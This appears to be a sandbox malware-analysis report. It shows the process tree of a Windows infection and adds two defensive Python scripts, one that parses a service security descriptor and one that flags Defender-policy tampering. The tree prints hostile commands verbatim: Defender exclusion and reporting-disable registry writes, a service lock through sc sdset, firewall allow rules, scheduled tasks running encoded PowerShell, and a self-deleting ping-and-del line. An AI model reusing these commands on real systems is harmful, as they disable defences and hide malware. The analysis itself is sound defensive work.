- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5144
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1344
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2836
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:5920
-
-
-
-
-
-
-
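The `sc sdset WinDefender ...` call above replaces the security descriptor of the dropped "WinDefender" service. Read as SDDL, the allow ACE for Builtin Administrators (BA) omits WP (SERVICE_STOP) and DT (SERVICE_PAUSE_CONTINUE), and a deny ACE `(D;;WPDT;;;BA)` then blocks both explicitly, so an administrator can no longer stop or pause the service through the SCM while Local System (SY) keeps the full right set. The deny ACE also sits after an allow ACE for the same trustee, which is non-canonical order; Windows still evaluates the DACL in the order written. The Python below is an added example for this report, not code from the sample or the sandbox: it parses that SDDL, names the service rights in each ACE, and models the ordered DACL walk that produces that result. The "typical default" descriptor used for comparison is an assumption taken from commonly documented service defaults, not something this report shows.

```python
"""Parse the SDDL applied by `sc sdset WinDefender ...` and evaluate who can
stop the service.  Added example for this report; not code from the sample."""
import re

# Security descriptor copied verbatim from the sc.exe command line above.
WINDEFENDER_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)
# Assumed typical default descriptor of a Windows service, for comparison only.
DEFAULT_SERVICE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

ACE_TYPES = {"A": "ALLOW", "D": "DENY", "AU": "AUDIT"}
# Two-letter SDDL right tokens as they map onto service objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
WELL_KNOWN_SIDS = {"SY": "Local System", "BA": "Administrators",
                   "IU": "Interactive Users", "SU": "Service Logon", "WD": "Everyone"}


def parse_acl(acl_text):
    """Return the ACEs of one ACL component as dicts, in the order written."""
    aces = []
    for body in re.findall(r"\(([^)]*)\)", acl_text):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
        if rights.lower().startswith("0x"):          # numeric access mask
            names = {rights}
        else:                                         # two-letter tokens
            names = {SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                     for i in range(0, len(rights), 2)}
        aces.append({"type": ACE_TYPES.get(ace_type, ace_type), "flags": flags,
                     "rights": names, "sid": sid})
    return aces


def parse_sddl(sddl):
    """Split an SDDL string into its O:/G:/D:/S: components and parse the ACLs."""
    parts = dict(re.findall(r"([OGDS]):(.*?)(?=[OGDS]:|$)", sddl))
    return {"owner": parts.get("O"), "group": parts.get("G"),
            "dacl": parse_acl(parts.get("D", "")), "sacl": parse_acl(parts.get("S", ""))}


def check_access(sddl, token_sids, requested):
    """Model the Windows DACL walk: ACEs are evaluated in order, a DENY that
    covers any still-unsatisfied right fails the request, an ALLOW satisfies
    the rights it carries, and rights left over at the end are denied."""
    remaining = set(requested)
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["sid"] not in token_sids:
            continue
        if ace["type"] == "DENY" and remaining & ace["rights"]:
            return False
        if ace["type"] == "ALLOW":
            remaining -= ace["rights"]
            if not remaining:
                return True
    return not remaining


def explicit_denials(sddl):
    """List (trustee, right) pairs carried by DENY ACEs, sorted."""
    pairs = set()
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["type"] == "DENY":
            for right in ace["rights"]:
                pairs.add((WELL_KNOWN_SIDS.get(ace["sid"], ace["sid"]), right))
    return sorted(pairs)


if __name__ == "__main__":
    for who in ("SY", "BA", "IU"):
        print(f"{WELL_KNOWN_SIDS[who]:18} can stop service: "
              f"{check_access(WINDEFENDER_SDDL, {who}, {'SERVICE_STOP'})}")
    print("explicit denials:", explicit_denials(WINDEFENDER_SDDL))
```

`check_access` takes the set of SID abbreviations present in the caller's token, so pass `{"BA", "IU"}` for an interactive administrator. The model ignores inheritance flags and generic-right mapping, neither of which occurs in this descriptor. Note the limit of the lock: the BA allow ACE still carries DC (SERVICE_CHANGE_CONFIG) and WD (WRITE_DAC), so an administrator can reset the descriptor with `sc sdset` or reconfigure the service; only stop and pause through the SCM are blocked.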
[3] C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | "C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3700

[4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264

[4] C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | "C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4656

[5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

[5] C:\Windows\system32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
PID:5492

[6] C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
- Modifies Windows Firewall
PID:5608

[5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:6004

[5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5708
[3] C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | "C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --silent --allusers=0
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:856

[4] C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e2ce1a8,0x6e2ce1b4,0x6e2ce1c0
- Executes dropped EXE
- Loads dropped DLL
PID:1904

[4] C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe | "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --version
- Executes dropped EXE
- Loads dropped DLL
PID:2560

[4] C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | "C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=856 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328021940" --session-guid=359b9ff4-76a1-4233-8f30-0c8fd2afda91 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=9405000000000000
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2024

[5] C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d94e1a8,0x6d94e1b4,0x6d94e1c0
- Executes dropped EXE
- Loads dropped DLL
PID:1108

[4] C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe | "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
- Executes dropped EXE
PID:5308

[4] C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe | "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --version
- Executes dropped EXE
- Loads dropped DLL
PID:4504

[5] C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe | "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xe30040,0xe3004c,0xe30058
- Executes dropped EXE
- Loads dropped DLL
PID:4620
[3] C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe | "C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe"
- Executes dropped EXE
PID:212

[4] C:\Users\Admin\AppData\Local\Temp\7zS851E.tmp\Install.exe | .\Install.exe
- Executes dropped EXE
PID:3436

[5] C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | .\Install.exe /FHdidhi "385118" /S
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:4136

[6] C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
PID:4444

[7] C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
PID:2208

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
PID:4600

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
PID:1796

[6] C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
PID:3740

[7] C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
PID:2796

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
PID:4204

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
PID:2880

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gqAfqLMsJ" /SC once /ST 01:29:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Creates scheduled task(s)
PID:3168

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gqAfqLMsJ"
PID:4620

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gqAfqLMsJ"
PID:4200

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ndbwepu.exe\" id /mCsite_idWPi 385118 /S" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5368
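The Install.exe subtree above tampers with Windows Defender through policy registry keys rather than through the Defender API: REG ADD is launched via forfiles.exe (a living-off-the-land indirection), each write is repeated for the 32-bit and 64-bit registry views, an `exe` entry is placed under Exclusions\Extensions, and SpyNetReporting is set to 0 under Spynet. A throw-away scheduled task then runs PowerShell with an -EncodedCommand. The Python below is an added example for this report, not code from the sample or the sandbox: it decodes the encoded command and classifies each Defender-policy write, run over a constructed list of command lines copied from this tree plus one benign control. It generalises beyond the lines above to the ThreatIDDefaultAction and Exclusions\Paths writes that appear later in the tree and to the Exclusions\Processes key, which this sample does not touch. The finding names are this example's own; the ThreatIDDefaultAction value names follow the documented Defender policy enumeration (6 = Allow).

```python
"""Triage helpers for the Defender-policy tampering and the encoded PowerShell
seen in this process tree.  Added example for this report; not code from the
sample or the sandbox.  The command lines below are copied from the tree."""
import base64
import re

# Constructed sample: command lines copied from the process tree, plus one
# benign schtasks call as a control.  Raw strings keep the \" escaping intact.
SAMPLE_CMDLINES = [
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32',
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;"',
    r'schtasks /CREATE /TN "gqAfqLMsJ" /SC once /ST 01:29:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /delete /tn ScheduledUpdate /f',
]

# One REG ADD against a Windows Defender key, quoted or unquoted, with the
# optional /f and the /reg:32|64 view that the sample always appends.
REG_ADD = re.compile(
    r'ADD\s+"?(?P<key>HK[A-Z_]+\\[^"]*?Windows Defender[^"]*?)"?\s+(?:/f\s+)?'
    r'/v\s+(?:"(?P<qname>[^"]*)"|(?P<name>\S+))\s+/t\s+(?P<type>REG_\w+)'
    r'\s+/d\s+(?P<data>\S+)(?:\s+/reg:(?P<view>32|64))?',
    re.IGNORECASE)
# Any -e... switch followed by a base64 blob; the prefix check below keeps
# only abbreviations of -EncodedCommand.
ENCODED = re.compile(r'-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})', re.IGNORECASE)

# Documented ThreatIDDefaultAction policy values.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    for flag, blob in ENCODED.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def classify_defender_write(key, name, data):
    """Map one Defender policy write to (finding kind, short detail)."""
    k = key.lower()
    if k.endswith(r"\exclusions\extensions"):
        return "defender_exclusion_extension", name
    if k.endswith(r"\exclusions\paths"):
        return "defender_exclusion_path", name
    if k.endswith(r"\exclusions\processes"):
        return "defender_exclusion_process", name
    if k.endswith(r"\spynet") and name.lower() == "spynetreporting":
        return "defender_maps_reporting", f"SpyNetReporting={data}"
    if k.endswith(r"\threats\threatiddefaultaction"):
        return "defender_threat_default_action", f"{name}={THREAT_ACTIONS.get(data, data)}"
    return "defender_policy_write", f"{name}={data}"


def triage(cmdlines):
    """Run both checks over a list of command lines and return the findings."""
    findings = []
    for idx, line in enumerate(cmdlines):
        unescaped = line.replace('\\"', '"')   # undo the \" quoting of wrapped calls
        for m in REG_ADD.finditer(unescaped):
            name = m["qname"] if m["qname"] is not None else m["name"]
            kind, detail = classify_defender_write(m["key"], name, m["data"])
            findings.append({"line": idx, "kind": kind, "detail": detail, "view": m["view"]})
        decoded = decode_encoded_command(line)
        if decoded is not None:
            findings.append({"line": idx, "kind": "encoded_powershell",
                             "detail": decoded, "view": None})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f"line {f['line']}: {f['kind']} view={f['view']} {f['detail']}")
```

The decoded task payload is `start-process -WindowStyle Hidden gpupdate.exe /force`, which matches the `gpupdate.exe /force` children of the two `powershell.EXE -WindowStyle Hidden -EncodedCommand ...` processes further down the tree: the policy refresh is what makes the freshly written Policies\Microsoft\Windows Defender values take effect. When adapting this to real telemetry, feed it the command-line field of process-creation events; the regex tolerates the three quoting styles that appear in this tree (plain, cmd-wrapped, and PowerShell-wrapped with `\"`).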
[3] C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | "C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe"
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2636
[3] C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe | "C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe"
- Executes dropped EXE
PID:5956

[4] C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\Install.exe | .\Install.exe
- Executes dropped EXE
PID:5156

[5] C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | .\Install.exe /FHdidhi "385118" /S
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:1276

[6] C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
PID:5560

[7] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
PID:5608

[7] C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
PID:5288

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
PID:5360

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOF
TWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
PID:3192

[6] C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
PID:5356

[7] C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
PID:888

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
PID:4444

[8] \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
PID:2052

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gXsUHyRfW" /SC once /ST 01:39:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Creates scheduled task(s)
PID:2208

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gXsUHyRfW"
PID:5256

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gXsUHyRfW"
PID:5392

[6] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe\" id /Jysite_idmve 385118 /S" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4872
[3] C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe | "C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6032

[4] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"
PID:2628

[5] C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1
- Runs ping.exe
PID:6048
[1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2244 -ip 2244
PID:216

[1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1108 -ip 1108
PID:5036

[1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1108 -ip 1108
PID:3332

[1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3092 -ip 3092
PID:4400

[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
PID:2804

[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
PID:3088

[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Suspicious use of AdjustPrivilegeToken
PID:2952

[2] C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
PID:5952

[1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 3636
PID:5464

